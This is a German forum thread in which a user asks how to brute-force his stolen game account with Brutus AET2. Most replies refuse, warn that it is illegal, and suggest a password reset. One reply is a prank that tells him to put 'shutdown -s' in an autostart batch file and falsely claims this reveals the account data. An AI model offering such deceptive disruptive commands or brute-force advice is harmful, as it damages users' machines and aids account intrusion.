Acc Back Hacken

09/17/2011 03:21 Zockermast#1
Hey Leute

Mir wurde mein Account in dem Game 4Story gehackt vor ca 4 Monaten ich schreibe seit dem mit dem Support ob sie nicht was machen können aber da ist wohl nix zu machen des halb will ich es jetzt selber in die Hand nehmen und meinen Acc back Hacken
Also ich habe Nun Brutus AET2 geöfffnet und nun will ich mein account passwort auf der seite rausfinden was muss ich nun machen?

Vielen Dank im Vorraus
09/17/2011 09:02 elementskate#2
Ich denke mal das das unter ein Gebiet fällt bei dem dich elitepvpers nicht unterstützen wird, da Bruteforcen illegal ist.

Deswegen werde ich den Thread mal melden
09/17/2011 10:29 unknown661#3
google doch einfach... hier sind solche anfragen nicht erlaubt
09/17/2011 12:15 JacK le chilla#4
omg vor 4 Monaten haha kannste vergessen da wird dir der support nicht helfen mach doch einfach passwort vergessen an deine email wenns deine ist weiter unterstützung wird dir hier keiner geben ^^
09/17/2011 17:40 Kraizy​#5
Quote:
Originally Posted by Zockermast View Post
Also ich habe Nun Brutus AET2 geöfffnet und nun will ich mein account passwort auf der seite rausfinden was muss ich nun machen?
Brutus AET2 wieder schließen.
09/17/2011 19:22 Brutalon#6
und das Thema "Back-Hacken" ist doch eh Kinderkacke. Du willst doch nur wissen wie man hacken kann + das hacken eines Accounts ist eine ziemlich Aufwändige Aktion, da reicht es nicht das dir einer sagt "Tu das - dann klappts". Das einzige was ich mir auf die kürze Vorstellen kann.

-> Brute-Force-Methode
09/17/2011 19:46 unknown661#7
@TE ich denk gameforge ist auch nicht blöd. wenn die merken dass das jemand versucht nen account zu bruten wird schätz ich mal entweder
- deine ip nach einigen versuchen gesperrt
- ip abuse an deinen provider gemeldet
- oder du bekommst gleich direkt ne anzeige

sicherlich gibts da auch noch die möglichkeit mit mehreren proxys usw.. aber lass es besser wenn du kA hast
09/17/2011 19:52 .SaFe#8
Okay, ich helf dir.. Mit der Methode kriegst du ihn zurück...
Öffne den Editor.
Trag ein : shutdown -s
Das speicherst du als Start.bat
Die Start.bat trägst du in den Autostart ein und startest sie.
Fertig, deine Accountdaten werden dir nun angezeigt.
09/22/2011 12:26 Adroxxx#9
Wir können nicht mit bestimmtheit sagen, dass es dein Account ist. Deswegen #closed.